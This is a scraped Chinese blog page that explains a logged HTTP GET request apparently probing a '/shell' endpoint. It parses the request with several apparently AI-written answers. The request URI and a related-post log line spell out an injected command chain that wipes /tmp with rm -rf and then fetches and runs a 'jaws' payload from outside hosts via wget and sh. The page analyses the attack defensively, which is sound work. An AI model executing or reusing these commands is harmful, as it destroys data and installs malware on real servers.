解析method:GET;status_code:;host:127.0.0.1;uri:/shell?cd+/tmp;rm+-rf+*;wget+heylitimysun.top/jaws;sh+/...

最新推荐文章于 2024-05-06 19:17:01 发布
最新推荐文章于 2024-05-06 19:17:01 发布
阅读量464 收藏 1
点赞数
文章标签: linux 服务器 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_35757191/article/details/129585532
版权

这是一个使用 HTTP 方法 GET 的请求,目标主机为 127.0.0.1,目标资源的 URI 是 /shell?cd /tmp,其中 ?cd /tmp 可能是在 URI 中传递的查询参数,接下来的命令 rm -rf *、wget heylitimysun.top/jaws、sh /tmp/jaws 可能是在执行远程命令或者下载并执行恶意软件。但是,由于我无法访问网络,无法确定这些命令的具体含义。

王元祺
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
FTP-document.rar_fit//127.0.0.1:5050_ftb 127.0.0.1 2121_ftb:127.
09-14
IP地址127.0.0.1 端口21 用户名admin 密码12345
我的服务器貌似被人攻击了,恶意输入了rm -rf *
qq_44758938的博客
01-04 4015
事前的经过是这样的。。。 前段时间我闲的无聊,我就自己趁着双十一,在百度智能云上买了个服务器,只要49半年(不是打广告啊,百度,打钱!),顺便买了个域名1块钱一年的。 然后我就开始琢磨起来服务器和网站的部署。然后上礼拜我在我空间里给大家看了我的未来的主页,其实也就是做个特效网页玩玩。 以上是背景 今天 2019年11月26日,我发现我的网站无法访问了,我测试了好几遍,确定是访问不了了,我就上去看...
Linux控制删除深度!除find ./ -maxdepth 1 -name "*.c" | xargs rm -rf
HWP
10-25 2661
find ./ -maxdepth 1 -name “*.c” | xargs rm -rf 也就是说-maxdepth 参数要写在其他参数的前面,同时在路径的后面 xargs命令 xargs命令通俗来讲就是将标准输入转成各种格式化的参数,所以命令[command 1] | xargs [command 2]就是将command 1的标准输出结果,通过管道|变成xargs的标准输入,然后xarg...
鸟哥Linux私房菜 命令笔记1
weixin_44649331的博客
05-23 167
locale:显示目前支援的语系 修改语系 Lang=en_US.utf8 export LC_ALL=en_US.utf8 date:显示日期与时间的指令 %Y 显示四位数字的年份:2019 、%y 显示两位数字的年份:19 %m 显示月份 、%M 显示分钟 、%h 显示月份的英文、 %H:显示小时 %d 显示当天天数 、%D:显示完整年月日简写 date +%Y-%m-%d 2019/0...
Linux常用命令 shell脚本for QA-数据脱敏版2
疯批美人
07-19 1942
由于博客官网存在图片上传失败的bug https://blogdev.blog.csdn.net/article/details/94006575 故此我之前的【Linux常用命令】的博客不可以编辑了https://blog.csdn.net/weixin_42498050/article/details/81037479,故此新建个博客吧~~ 4 .在文件最后一列加,逗号 sed...
【记录一次服务器被攻击】-[附带解决方案]
qq_41506710的博客
04-10 7241
当我准备重新构建docker项目时,发现一条某个IP的不正常请求. 日志如下 yudao-ui-admin | 156.219.223.76 - - [09/Apr/2022:16:49:37 +0000] "GET /shell?cd+/tmp;rm+-rf+*;wget+23.94.50.159/jaws;sh+/tmp/jaws HTTP/1.1" 200 10315 "-" "Hello, world" "-" 我的项目是用的开源项目 ruoyi-vue-pro 用的是:docker构建项目
5W字穿透 ELK(史上最全):elasticsearch +logstash+kibana
架构师尼恩
09-26 4090
Elasticsearch 是一个分布式的开源搜索和分析引擎,在的基础上开发而成。Lucene 是开源的搜索引擎工具包,Elasticsearch 充分利用Lucene,并对其进行了扩展,使存储、索引、搜索都变得更快、更容易, 而最重要的是, 正如名字中的“ elastic ”所示, 一切都是灵活、有弹性的。而且,应用代码也不是必须用Java 书写才可以和Elasticsearc兼容,完全可以通过JSON 格式的HTTP 请求来进行索引、搜索和管理Elasticsearch 集群。
学习笔记:SpringCloud 微服务技术栈_实用篇①_基础知识
做笔记,记录学习中遇到的问题。
07-14 1862
本博客主要讲述了微服务的远程调用的简单案例、Eureka 注册中心、Nacos 注册中心、Fegin 的远程调用、统一 GateWay、Docker、MQ 消息队列、ElasticSearch 分布式搜索的基础知识。
SpringCloud 微服务 RuoYi-Cloud 部署文档(DevOps版)(2023-10-18) argo-rollouts + istio(金丝雀发布)(渐进式交付)
weixin_44797299的博客
10-19 5049
SpringCloud 微服务 RuoYi-Cloud 部署文档(DevOps版)(2023-10-18)argo-rollouts + istio(金丝雀发布)(渐进式交付)基础集群组件RuoYi-Cloud 业务组件。
我利用DevOps给公司来一套组合拳会产生什么样的效果
hrk1234的博客
01-06 2627
三、使用 jenkins+GitLab+ansible+shell 组合拳实现一键同时在上百台服务器实现代码同步 注意事项: 这套组合拳一键自动部署代码同步到上百台服务器,大量的节省了运维成本和时间成本,有更多的时间用来摸鱼,千万别被老板发现哦
解决vue net :ERR_CONNECTION_REFUSED报错问题
10-14
主要介绍了解决vue net :ERR_CONNECTION_REFUSED报错问题,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧
Webtest(jsp).rar_Java ODBC SQLSERVER_http/2-class.com/_jsp_试卷_选择
09-19
Connection conn = DriverManager.getConnection(driver,"","") 修改成: Class.forName("sun.jdbc.odbc.JdbcOdbcDriver") String driver = "jdbc:odbc:try" Connection conn = DriverManager.getConnection...
cxl-node-template::crescent_moon:基于node+express+mysql 快速开发脚手架
05-12
cxl-node-template :crescent_moon:基于node+express+mysql 快速开发脚手架 项目介绍 适应前后端分离开发的一款基于node快速接口简单开发脚手架(模板),集成了...访问127.0.0.1:10317,您将会看到如下页面,证明启动成功
C ++入门之旅。 点击此处进行游览:-C/C++开发
05-27
单击此处进行游览就在这里进行游览吗?...开发纱线服务-在127.0.0.1:8080上运行开发服务器。 它会监视您的文件,并在发生任何更改时自动重建。 生产纱线的构建将构建具有所有优化功能的生产版本。 结果生成
linux下的调试工具gdb的详细使用介绍
qq_75270497的博客
05-06 992
详细介绍在linux下使用gdb的方法,每个步骤都举例说明,适合复习和新手入门,希望能为能够帮助到大家。
Linux 第十八章
一怀明月的博客
05-01 1353
程序地址空间 区间的地址分布 真正理解同一个地址进行读取不同内容 地址空间 虚拟地址和物理地址 虚拟地址: 物理地址: struct mm_struct 页表
Linux字符设备驱动(一) - 框架
最新发布
滴水藏海
05-06 959
字符设备驱动的注册
Linux】目录和文件相关的命令,补充:centos7系统目录结构
yannan20190313的博客
05-05 952
Linux】目录和文件相关的命令,补充:centos7系统目录结构
解析method:GET;status_code:;host:127.0.0.1;uri:/shell?cd+/tmp;rm+-rf+*;wget+heylitimysun.top/jaws;sh+/tmp/jaws;
09-08
### 回答1: 这是一个使用 HTTP 方法 GET 的请求,目标主机为 127.0.0.1,目标资源的 URI 是 /shell?cd /tmp,其中 ?cd /tmp 可能是在 URI 中传递的查询参数,接下来的命令 rm -rf *、wget heylitimysun.top/jawssh /tmp/jaws 可能是在执行远程命令或者下载并执行恶意软件。但是,由于我无法访问网络,无法确定这些命令的具体含义。 ### 回答2: 这是一个针对网络主机的请求,使用的HTTP方法是GET。从请求中可以得知主机的IP地址是127.0.0.1URI则是/shell。在URI中,包含了一系列命令用于操作主机。 首先,通过cd /tmp命令,更改当前的工作目录至/tmp目录下。 接着,执行rm -rf *命令,该命令会递归删除/tmp目录下的所有文件和子目录。这样的操作可能是为了清理/tmp目录。 接下来,使用wget命令下载文件,URL为heylitimysun.top/jaws,下载的目标路径为/tmp/jaws。 最后,执行sh /tmp/jaws命令,通过执行/tmp目录下的jaws文件来执行一些未知的操作。 总体而言,这个请求可能会对主机的/tmp目录进行清理,并下载并执行一个名为jaws的文件。根据具体情况来看,这个操作可能是有恶意的,因为它可能会对主机产生不可预测的影响,例如下载恶意软件或执行破坏性的命令。对于网络安全来说,我们应该保持警惕并防止此类请求对系统造成损害。 ### 回答3: 根据给定的请求信息解析如下: - method: GET (请求方法为GET,表示客户端想要获取服务器上的某个资源) - status_code: (状态码为空,通常状态码会根据服务器的处理结果返回给客户端,这里并未指定) - host: 127.0.0.1 (请求的主机地址为127.0.0.1,即本地主机) - uri: /shell?cd /tmp;rm -rf *;wget heylitimysun.top/jaws;sh /tmp/jaws (请求的URI路径为/shell,并附带了一些具体指令) 该请求的具体操作指令如下: 1. cd /tmp:切换当前目录到/tmp(临时目录)。 2. rm -rf *:递归删除当前目录中的所有文件和子文件夹。 3. wget heylitimysun.top/jaws:使用wget命令从heylitimysun.top/jaws下载文件。 4. sh /tmp/jaws:执行/tmp目录下的jaws文件。 根据以上指令来看,该请求的目的是在本地主机上执行一系列操作。具体操作内容包括切换至临时目录、删除临时目录中所有文件、从指定URL下载文件,并在临时目录下执行该文件。 需要注意的是,该请求可能存在安全风险,因为执行该请求的服务器可能受到恶意文件的下载和执行。在实际情况中,需要对这样的请求进行审查并加以防范。同时,作为用户,我们也需要谨慎对待类似的请求,避免误操作或受到恶意攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值